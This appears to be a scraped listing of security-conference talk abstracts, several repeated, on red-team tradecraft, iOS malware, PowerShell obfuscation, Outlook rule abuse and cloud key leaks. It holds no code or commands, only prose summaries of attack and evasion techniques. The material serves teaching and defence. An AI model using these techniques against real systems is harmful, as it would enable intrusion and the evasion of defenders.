Talk Venue: BSides Tampa 2020
Speakers: Mike Felch & Joff Thyer
This talk will focus on the many different ways that a penetration tester, or Red Teamer can leverage the Python programming language during offensive operations. Python is a rich and powerful programming language which above all else allows a competent developer to very quickly write new tools that might start as a Proof of Concept, but soon become an invaluable addition to the Red Teamer's tool-belt. Having the skills to both generate new tools, and modify existing tools on the fly is critically important to agility during testing engagement. Everything from utility processing of data, network protocol, API interaction, and exploit development can be rapidly developed due to the high functionality level and intuitive nature of Python.
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoShakacon
Since 2014, fifteen new malware or riskware families successfully attacked non-jailbroken iOS devices (e.g., WireLurker, Oneclickfraud, XcodeGhost, InstaAgent, ZergHelper, AceDeceiver), affected thousands of iOS apps and tens of millions users around the world. Ten of them even bypassed Apple’s code vetting and occurred at App Store. In this presentation, we will systematically study how could these malware, riskware and some Proof-of-Concepts infect non-jailbroken devices via practical vectors and approaches including abusing development certificates, bypassing code review by obfuscation, performing FairPlay MITM attack, abusing MDM solution, abusing private APIs, exploiting design flaws or app level vulnerabilities, and stealing privacy data. For each topic, we will introduce its implementation, explore real world cases, analyze its risky and consequences, explain Apple’s countermeasures, and discuss why some problems will still exist in near future. We will also share some stories of how we discovered those interesting iOS malware. Through this topic, audiences could make more effective policies to protect iOS devices in their organizations, build their own systems/tools to evaluate security risks in iOS apps, and hunt more iOS malware in the future.
Red Team Tactics for Cracking the GSuite PerimeterMike Felch
As more corporations adopt Google for providing cloud services they are also inheriting the security risks associated with centralized computing, email and data storage outside the perimeter. In order for pentesters and red teamers to remain effective in analyzing security risks, they must adapt techniques in a way that brings value to the customer.
In this presentation we will begin by demonstrating adaptive techniques to crack the perimeter of Google Suite customers. Next, we will show how evasion can be accomplished by hiding in plain-sight due to failures in incident response plans. Finally, we will also show how a simple compromise could mean collateral damage for customers who are not carefully monitoring these cloud environments.
This document discusses various techniques for finding and exploiting vulnerabilities during a penetration test when vulnerabilities are marked as "low" or "medium" in severity. It argues that penetration testers and clients should not rely solely on vulnerability scanners and should thoroughly investigate even lower severity issues. Specific techniques mentioned include exploiting default credentials on services like VNC, exploiting exposed admin interfaces found through tools like Metasploit, taking advantage of browsable directories with backups or other sensitive files, exploiting SharePoint misconfigurations, exploiting HTTP PUT or WebDAV configurations, exploiting Apple Filing Protocol, and exploiting trace.axd to view request details in .NET applications. The document emphasizes finding overlooked vulnerabilities and keeping "a human in the mix" rather than full reliance
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
This document discusses 10 different ways to execute code remotely on Windows systems, including native Windows tools like Sysinternals PSExec, methods in Metasploit like PSExec and PSExec-MOF, and other techniques like WMI, PowerShell, and RemCom. Each method is briefly outlined with its positives and negatives. For example, PSExec leaves the PSEXESVC service running but never needs updating, while Metasploit PSExec supports pass-the-hash but some antiviruses may flag the service binary. The document provides an overview of common remote code execution options for pentesters and their relative tradeoffs.
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
The number of corporations establishing bug bounty programs in order to accomplish early discovery of vulnerabilities is increasing. So far, I have reported vulnerabilities in Firefox and received 45,000 USD (5,400,000 JPY) in bounties from the developer, which is the Mozilla Foundation. As a matter of fact, the vulnerabilities discovered in Firefox have a trend however, the awareness of the trend has not being raised among the Firefox developers and every time a new feature is implemented, a similar vulnerability is repeatedly created in the code. In this session, based on the vulnerabilities I have discovered in the past, I will introduce the patterns of vulnerabilities frequently observed in Firefox and delineate the root cause of those vulnerabilities. In addition, I will introduce my practical method that will allow you to effectively discover bugs in Firefox. This method is actually applicable not only to Firefox but any other open source software as it is based on an issue particular to open source software.
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...CODE BLUE
Adobe Reader’s JavaScript APIs offer a rich set of functionality for document authors. These APIs allow for processing forms, controlling multimedia events, and communicating with databases, all of which provide end-users the ability to create complex documents. This complexity provides a perfect avenue for attackers to take advantage of weaknesses that exist in Reader’s JavaScript APIs.
In this talk, we will provide insight into both the documented and undocumented APIs available in Adobe Reader. Several code auditing techniques will be shared to aid in vulnerability discovery, along with numerous proofs-of-concept which highlight real-world examples. We’ll detail out how to chain several unique issues to obtain execution in a privileged context. Finally, we’ll describe how to construct an exploit that achieves remote code execution without the need for memory corruption.
Talk Venue: BSides Tampa 2020
Speakers: Mike Felch & Joff Thyer
This talk will focus on the many different ways that a penetration tester, or Red Teamer can leverage the Python programming language during offensive operations. Python is a rich and powerful programming language which above all else allows a competent developer to very quickly write new tools that might start as a Proof of Concept, but soon become an invaluable addition to the Red Teamer's tool-belt. Having the skills to both generate new tools, and modify existing tools on the fly is critically important to agility during testing engagement. Everything from utility processing of data, network protocol, API interaction, and exploit development can be rapidly developed due to the high functionality level and intuitive nature of Python.
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoShakacon
Since 2014, fifteen new malware or riskware families successfully attacked non-jailbroken iOS devices (e.g., WireLurker, Oneclickfraud, XcodeGhost, InstaAgent, ZergHelper, AceDeceiver), affected thousands of iOS apps and tens of millions users around the world. Ten of them even bypassed Apple’s code vetting and occurred at App Store. In this presentation, we will systematically study how could these malware, riskware and some Proof-of-Concepts infect non-jailbroken devices via practical vectors and approaches including abusing development certificates, bypassing code review by obfuscation, performing FairPlay MITM attack, abusing MDM solution, abusing private APIs, exploiting design flaws or app level vulnerabilities, and stealing privacy data. For each topic, we will introduce its implementation, explore real world cases, analyze its risky and consequences, explain Apple’s countermeasures, and discuss why some problems will still exist in near future. We will also share some stories of how we discovered those interesting iOS malware. Through this topic, audiences could make more effective policies to protect iOS devices in their organizations, build their own systems/tools to evaluate security risks in iOS apps, and hunt more iOS malware in the future.
Red Team Tactics for Cracking the GSuite PerimeterMike Felch
As more corporations adopt Google for providing cloud services they are also inheriting the security risks associated with centralized computing, email and data storage outside the perimeter. In order for pentesters and red teamers to remain effective in analyzing security risks, they must adapt techniques in a way that brings value to the customer.
In this presentation we will begin by demonstrating adaptive techniques to crack the perimeter of Google Suite customers. Next, we will show how evasion can be accomplished by hiding in plain-sight due to failures in incident response plans. Finally, we will also show how a simple compromise could mean collateral damage for customers who are not carefully monitoring these cloud environments.
This document discusses various techniques for finding and exploiting vulnerabilities during a penetration test when vulnerabilities are marked as "low" or "medium" in severity. It argues that penetration testers and clients should not rely solely on vulnerability scanners and should thoroughly investigate even lower severity issues. Specific techniques mentioned include exploiting default credentials on services like VNC, exploiting exposed admin interfaces found through tools like Metasploit, taking advantage of browsable directories with backups or other sensitive files, exploiting SharePoint misconfigurations, exploiting HTTP PUT or WebDAV configurations, exploiting Apple Filing Protocol, and exploiting trace.axd to view request details in .NET applications. The document emphasizes finding overlooked vulnerabilities and keeping "a human in the mix" rather than full reliance
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
This document discusses 10 different ways to execute code remotely on Windows systems, including native Windows tools like Sysinternals PSExec, methods in Metasploit like PSExec and PSExec-MOF, and other techniques like WMI, PowerShell, and RemCom. Each method is briefly outlined with its positives and negatives. For example, PSExec leaves the PSEXESVC service running but never needs updating, while Metasploit PSExec supports pass-the-hash but some antiviruses may flag the service binary. The document provides an overview of common remote code execution options for pentesters and their relative tradeoffs.
Defeating firefox by Muneaki Nishimunea - CODE BLUE 2015CODE BLUE
The number of corporations establishing bug bounty programs in order to accomplish early discovery of vulnerabilities is increasing. So far, I have reported vulnerabilities in Firefox and received 45,000 USD (5,400,000 JPY) in bounties from the developer, which is the Mozilla Foundation. As a matter of fact, the vulnerabilities discovered in Firefox have a trend however, the awareness of the trend has not being raised among the Firefox developers and every time a new feature is implemented, a similar vulnerability is repeatedly created in the code. In this session, based on the vulnerabilities I have discovered in the past, I will introduce the patterns of vulnerabilities frequently observed in Firefox and delineate the root cause of those vulnerabilities. In addition, I will introduce my practical method that will allow you to effectively discover bugs in Firefox. This method is actually applicable not only to Firefox but any other open source software as it is based on an issue particular to open source software.
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...CODE BLUE
Adobe Reader’s JavaScript APIs offer a rich set of functionality for document authors. These APIs allow for processing forms, controlling multimedia events, and communicating with databases, all of which provide end-users the ability to create complex documents. This complexity provides a perfect avenue for attackers to take advantage of weaknesses that exist in Reader’s JavaScript APIs.
In this talk, we will provide insight into both the documented and undocumented APIs available in Adobe Reader. Several code auditing techniques will be shared to aid in vulnerability discovery, along with numerous proofs-of-concept which highlight real-world examples. We’ll detail out how to chain several unique issues to obtain execution in a privileged context. Finally, we’ll describe how to construct an exploit that achieves remote code execution without the need for memory corruption.
TeelTech - Advancing Mobile Device Forensics (online version)Mike Felch
This document provides an overview of a training on advancing mobile device forensics through reverse engineering and programming techniques. It discusses how traditional forensic tools are becoming less effective at recovering data from newer devices and applications that are designed for privacy. The training will demonstrate extracting artifacts from a raw device image using a hex editor and Python scripts. It also outlines a simulated criminal investigation involving the murder of a victim, and how analyzing the digital evidence from the victim and suspect's mobile phones through these new techniques revealed deleted messages that are relevant to the case.
This presentation discusses how access keys can leak from cloud services like AWS, Azure, and GCP. It outlines several ways keys may leak, such as from unsecured storage containers, compromised accounts, and web applications. The presentation then demonstrates a tool called DumpsterDiver that uses entropy analysis to hunt for private keys within files. Countermeasures discussed include access control, encryption, VPN access only, multi-factor authentication, regular data verification, and penetration testing. The goal is to show how keys can leak and discuss reliable prevention strategies.
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
The very best attackers often use PowerShell to hide their scripts from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not enable this PowerShell logging. Therefore, I will provide techniques that the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will conclude this talk by highlighting the public release of Invoke-Obfuscation. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line argument detection mechanisms.
--- Daniel Bohannon
Daniel Bohannon is an Incident Response Consultant at MANDIANT with over six years of operations and information security experience. His particular areas of expertise include enterprise-wide incident response investigations, host-based security monitoring, data aggregation and anomaly detection, and PowerShell-based attack research and detection techniques. As an incident response consultant, Mr. Bohannon provides emergency services to clients when security breach occur. He also develops new methods for detecting malicious PowerShell usage at both the host- and network-level while researching obfuscation techniques for PowerShell- based attacks that are being used by numerous threat groups. Prior to joining MANDIANT, Mr. Bohannon spent five years working in both IT operations and information security roles in the private retail industry. There he developed operational processes for the automated aggregation and detection of host- and network-based anomalies in a large PCI environment. Mr. Bohannon also programmed numerous tools for host-based hunting while leading the organization’s incident response team. Mr. Bohannon received a Master of Science in Information Security from the Georgia Institute of Technology and a Bachelor of Science in Computer Science from The University of Georgia.
Adversarial Post-Ex: Lessons From The ProsJustin Warner
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior to improve defensive capabilities.
This presentation by Christopher Grayson covers some lessons learned as a security professional that has made his way into software engineering full time.
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
On June, thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO & founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating its legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over victims Facebook and Google Drive accounts. After puzzling the script, they managed to extract the proverbial needle from a haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bites and bytes of the campaign and explaining how the attackers exploited Facebook to spread the malware.
--- Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
--- Dani Goland
Dani is the CEO and founder of Undot, an Israeli-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in Hackathons (programming competitions) and won 1st places at HackTrackTLV 2016 and eBay Hackathon 2015.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, is certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude in deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
DerbyCon 2016
Nick Landers @monoxgas
External mail via Exchange is one of the most common services offered by organizations today. The Microsoft Office suite is even more prevalent making Outlook the most common mail client around. This talk focuses on the abuse of these two products for the purpose of gaining code execution inside remote networks. Subjects include E-Mail and password scraping, OWA/EWS brute forcing techniques, and new research into abusing Outlook mail rules for remote code execution. Learn about the capabilities of client side rules, the underlying Windows APIs, and how to modify these rule objects to make phishing attacks obsolete. Security Consultant at Silent Break Security. Professional Hacker for 2 years. Current work involves writing custom malware and researching unique attack vectors that abuse functionality in windows environments.
The document discusses cybersecurity issues related to IoT devices. It begins by describing the 2016 Mirai botnet attacks, which exploited vulnerabilities in IoT devices like IP cameras and DVRs to take down major websites. The document then analyzes the current security situations of IoT, finding that many devices have vulnerabilities due to a lack of focus on security by manufacturers. It also notes that IoT devices could potentially be used as "weapons of mass destruction" due to their ubiquity, connectivity and potential access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.
Pentest Apocalypse-That's when you hire a pentester, and they walk all over your network. To avoid this, organizations need to be prepared before the first packet is sent in order to get the most value from the tester. There is no excuse for pentesters to find critical vulnerabilities that are six years old on an assessment. And who needs a zero-day when employees leave credentials on wide-open shares? Just like how Doomsday Preppers helps you prepare for the apocalypse, this presentation will help you prepare for, and avoid, a pentest apocalypse by describing common vulnerabilities found on many assessments. Being prepared for common pentester activities will not only help add value to a pentest but will also help prevent attackers from using the same tactics to compromise your organization.
For More Information Please Visit:- http://bsidestampa.net
http://www.irongeek.com/i.php?page=videos/bsidestampa2015/104-pentest-apocalypse-beau-bullock
Andrew Morris collected malware samples over the weekend using Dionaea and JBoss honeypots. The Dionaea honeypot captured over 100 Conficker malware samples exploiting Windows SMB vulnerabilities. The JBoss honeypot was infected by the ZECMD worm within 24 hours, exploiting exposed JMX consoles. Both provided real-world malware samples for analysis without risking other systems on Morris' network. He offered to collaborate on further manual analysis of the samples.
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
This presentation discusses penetration testing techniques from an unconventional perspective. It advocates for intelligence gathering and footprinting before scanning or exploitation to have a more effective assessment. Specific techniques discussed include using open source intelligence gathering on internal and external systems to develop profiles and target lists. Footprinting activities within the network focus on enumeration of users, shares, services and other details to identify vulnerable systems rather than broad scanning. The presentation provides examples of exploiting old vulnerabilities in applications like Citrix and weaknesses in administration interfaces. It emphasizes continuing post-exploitation activities like privilege escalation and lateral movement within compromised systems to fully evaluate security.
This document provides an introduction to studying, collecting, and finding bugs. It discusses how to collect bugs by following security mailing lists, bug bounty programs, security researchers on Twitter. It also discusses how to study bugs by analyzing code diffs between vulnerable and patched versions, building test environments, and documenting findings. The document then covers hunting for bugs by finding targets on sites like GitHub and HackerNews, setting up test environments, and optimizing hunting strategies based on collected bugs. Finally, it discusses responsible disclosure of bugs and some of the author's favorite bugs.
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.
The last few years have seen a dramatic increase in the number of PowerShell-based penetration testing tools. A benefit of tools written in PowerShell is that it is installed by default on every Windows system. This allows us as attackers to “”live off the land””. It also has built-in functionality to run in memory bypassing most security products.
I will walk through various methodologies I use surrounding popular PowerShell tools. Details on attacking an organization remotely, establishing command and control, and escalating privileges within an environment all with PowerShell will be discussed. You say you’ve blocked PowerShell? Techniques for running PowerShell in locked down environments that block PowerShell will be highlighted as well.
TABLETOP SCENARIO: Your organization regularly patches, uses application whitelisting, has NextGen-NG™ firewalls/IDS’s, and has the latest Cyber-APT-Trapping-Blinky-Box™. You were just made aware that your entire customer database was found being sold on the dark web. Go.
Putting too much trust in security products alone can be the downfall of an organization. In the 2015 BSides Tampa talk “Pentest Apocalypse” Beau discussed 10 different pentesting techniques that allow attackers to easily compromise an organization. These techniques still work for many organizations but occasionally more advanced tactics and techniques are required. This talk will continue where “Pentest Apocalypse” left off and demonstrate a number of red team techniques that organizations need to be aware of in order to prevent a “Red Team Apocalypse” as described in the tabletop scenario above.
The document provides a summary of the top 10 threats to cloud security as presented by James Condon from Lacework. The top threats are: 1) publicly accessible resources, 2) leaked keys, 3) malicious insiders, 4) brute force attacks, 5) remote code execution, 6) container escapes, 7) supply chain attacks, 8) malware, 9) cryptojacking, and 10) ransomware. For each threat, examples are given and mitigations are proposed. The document concludes by introducing Lacework's unified cloud security platform.
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
TeelTech - Advancing Mobile Device Forensics (online version)Mike Felch
This document provides an overview of a training on advancing mobile device forensics through reverse engineering and programming techniques. It discusses how traditional forensic tools are becoming less effective at recovering data from newer devices and applications that are designed for privacy. The training will demonstrate extracting artifacts from a raw device image using a hex editor and Python scripts. It also outlines a simulated criminal investigation involving the murder of a victim, and how analyzing the digital evidence from the victim and suspect's mobile phones through these new techniques revealed deleted messages that are relevant to the case.
This presentation discusses how access keys can leak from cloud services like AWS, Azure, and GCP. It outlines several ways keys may leak, such as from unsecured storage containers, compromised accounts, and web applications. The presentation then demonstrates a tool called DumpsterDiver that uses entropy analysis to hunt for private keys within files. Countermeasures discussed include access control, encryption, VPN access only, multi-factor authentication, regular data verification, and penetration testing. The goal is to show how keys can leak and discuss reliable prevention strategies.
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
The very best attackers often use PowerShell to hide their scripts from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not enable this PowerShell logging. Therefore, I will provide techniques that the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will conclude this talk by highlighting the public release of Invoke-Obfuscation. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line argument detection mechanisms.
--- Daniel Bohannon
Daniel Bohannon is an Incident Response Consultant at MANDIANT with over six years of operations and information security experience. His particular areas of expertise include enterprise-wide incident response investigations, host-based security monitoring, data aggregation and anomaly detection, and PowerShell-based attack research and detection techniques. As an incident response consultant, Mr. Bohannon provides emergency services to clients when security breach occur. He also develops new methods for detecting malicious PowerShell usage at both the host- and network-level while researching obfuscation techniques for PowerShell- based attacks that are being used by numerous threat groups. Prior to joining MANDIANT, Mr. Bohannon spent five years working in both IT operations and information security roles in the private retail industry. There he developed operational processes for the automated aggregation and detection of host- and network-based anomalies in a large PCI environment. Mr. Bohannon also programmed numerous tools for host-based hunting while leading the organization’s incident response team. Mr. Bohannon received a Master of Science in Information Security from the Georgia Institute of Technology and a Bachelor of Science in Computer Science from The University of Georgia.
Adversarial Post-Ex: Lessons From The ProsJustin Warner
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior to improve defensive capabilities.
This presentation by Christopher Grayson covers some lessons learned as a security professional that has made his way into software engineering full time.
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
On June, thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO & founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating its legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over victims Facebook and Google Drive accounts. After puzzling the script, they managed to extract the proverbial needle from a haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bites and bytes of the campaign and explaining how the attackers exploited Facebook to spread the malware.
--- Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
--- Dani Goland
Dani is the CEO and founder of Undot, an Israeli-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in Hackathons (programming competitions) and won 1st places at HackTrackTLV 2016 and eBay Hackathon 2015.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, is certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude in deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
DerbyCon 2016
Nick Landers @monoxgas
External mail via Exchange is one of the most common services offered by organizations today. The Microsoft Office suite is even more prevalent making Outlook the most common mail client around. This talk focuses on the abuse of these two products for the purpose of gaining code execution inside remote networks. Subjects include E-Mail and password scraping, OWA/EWS brute forcing techniques, and new research into abusing Outlook mail rules for remote code execution. Learn about the capabilities of client side rules, the underlying Windows APIs, and how to modify these rule objects to make phishing attacks obsolete. Security Consultant at Silent Break Security. Professional Hacker for 2 years. Current work involves writing custom malware and researching unique attack vectors that abuse functionality in windows environments.
The document discusses cybersecurity issues related to IoT devices. It begins by describing the 2016 Mirai botnet attacks, which exploited vulnerabilities in IoT devices like IP cameras and DVRs to take down major websites. The document then analyzes the current security situations of IoT, finding that many devices have vulnerabilities due to a lack of focus on security by manufacturers. It also notes that IoT devices could potentially be used as "weapons of mass destruction" due to their ubiquity, connectivity and potential access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.
Pentest Apocalypse-That's when you hire a pentester, and they walk all over your network. To avoid this, organizations need to be prepared before the first packet is sent in order to get the most value from the tester. There is no excuse for pentesters to find critical vulnerabilities that are six years old on an assessment. And who needs a zero-day when employees leave credentials on wide-open shares? Just like how Doomsday Preppers helps you prepare for the apocalypse, this presentation will help you prepare for, and avoid, a pentest apocalypse by describing common vulnerabilities found on many assessments. Being prepared for common pentester activities will not only help add value to a pentest but will also help prevent attackers from using the same tactics to compromise your organization.
For More Information Please Visit:- http://bsidestampa.net
http://www.irongeek.com/i.php?page=videos/bsidestampa2015/104-pentest-apocalypse-beau-bullock
Andrew Morris collected malware samples over the weekend using Dionaea and JBoss honeypots. The Dionaea honeypot captured over 100 Conficker malware samples exploiting Windows SMB vulnerabilities. The JBoss honeypot was infected by the ZECMD worm within 24 hours, exploiting exposed JMX consoles. Both provided real-world malware samples for analysis without risking other systems on Morris' network. He offered to collaborate on further manual analysis of the samples.
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
This presentation discusses penetration testing techniques from an unconventional perspective. It advocates for intelligence gathering and footprinting before scanning or exploitation to have a more effective assessment. Specific techniques discussed include using open source intelligence gathering on internal and external systems to develop profiles and target lists. Footprinting activities within the network focus on enumeration of users, shares, services and other details to identify vulnerable systems rather than broad scanning. The presentation provides examples of exploiting old vulnerabilities in applications like Citrix and weaknesses in administration interfaces. It emphasizes continuing post-exploitation activities like privilege escalation and lateral movement within compromised systems to fully evaluate security.
This document provides an introduction to studying, collecting, and finding bugs. It discusses how to collect bugs by following security mailing lists, bug bounty programs, security researchers on Twitter. It also discusses how to study bugs by analyzing code diffs between vulnerable and patched versions, building test environments, and documenting findings. The document then covers hunting for bugs by finding targets on sites like GitHub and HackerNews, setting up test environments, and optimizing hunting strategies based on collected bugs. Finally, it discusses responsible disclosure of bugs and some of the author's favorite bugs.
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.
The last few years have seen a dramatic increase in the number of PowerShell-based penetration testing tools. A benefit of tools written in PowerShell is that it is installed by default on every Windows system. This allows us as attackers to “”live off the land””. It also has built-in functionality to run in memory bypassing most security products.
I will walk through various methodologies I use surrounding popular PowerShell tools. Details on attacking an organization remotely, establishing command and control, and escalating privileges within an environment all with PowerShell will be discussed. You say you’ve blocked PowerShell? Techniques for running PowerShell in locked down environments that block PowerShell will be highlighted as well.
TABLETOP SCENARIO: Your organization regularly patches, uses application whitelisting, has NextGen-NG™ firewalls/IDS’s, and has the latest Cyber-APT-Trapping-Blinky-Box™. You were just made aware that your entire customer database was found being sold on the dark web. Go.
Putting too much trust in security products alone can be the downfall of an organization. In the 2015 BSides Tampa talk “Pentest Apocalypse” Beau discussed 10 different pentesting techniques that allow attackers to easily compromise an organization. These techniques still work for many organizations but occasionally more advanced tactics and techniques are required. This talk will continue where “Pentest Apocalypse” left off and demonstrate a number of red team techniques that organizations need to be aware of in order to prevent a “Red Team Apocalypse” as described in the tabletop scenario above.
The document provides a summary of the top 10 threats to cloud security as presented by James Condon from Lacework. The top threats are: 1) publicly accessible resources, 2) leaked keys, 3) malicious insiders, 4) brute force attacks, 5) remote code execution, 6) container escapes, 7) supply chain attacks, 8) malware, 9) cryptojacking, and 10) ransomware. For each threat, examples are given and mitigations are proposed. The document concludes by introducing Lacework's unified cloud security platform.
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
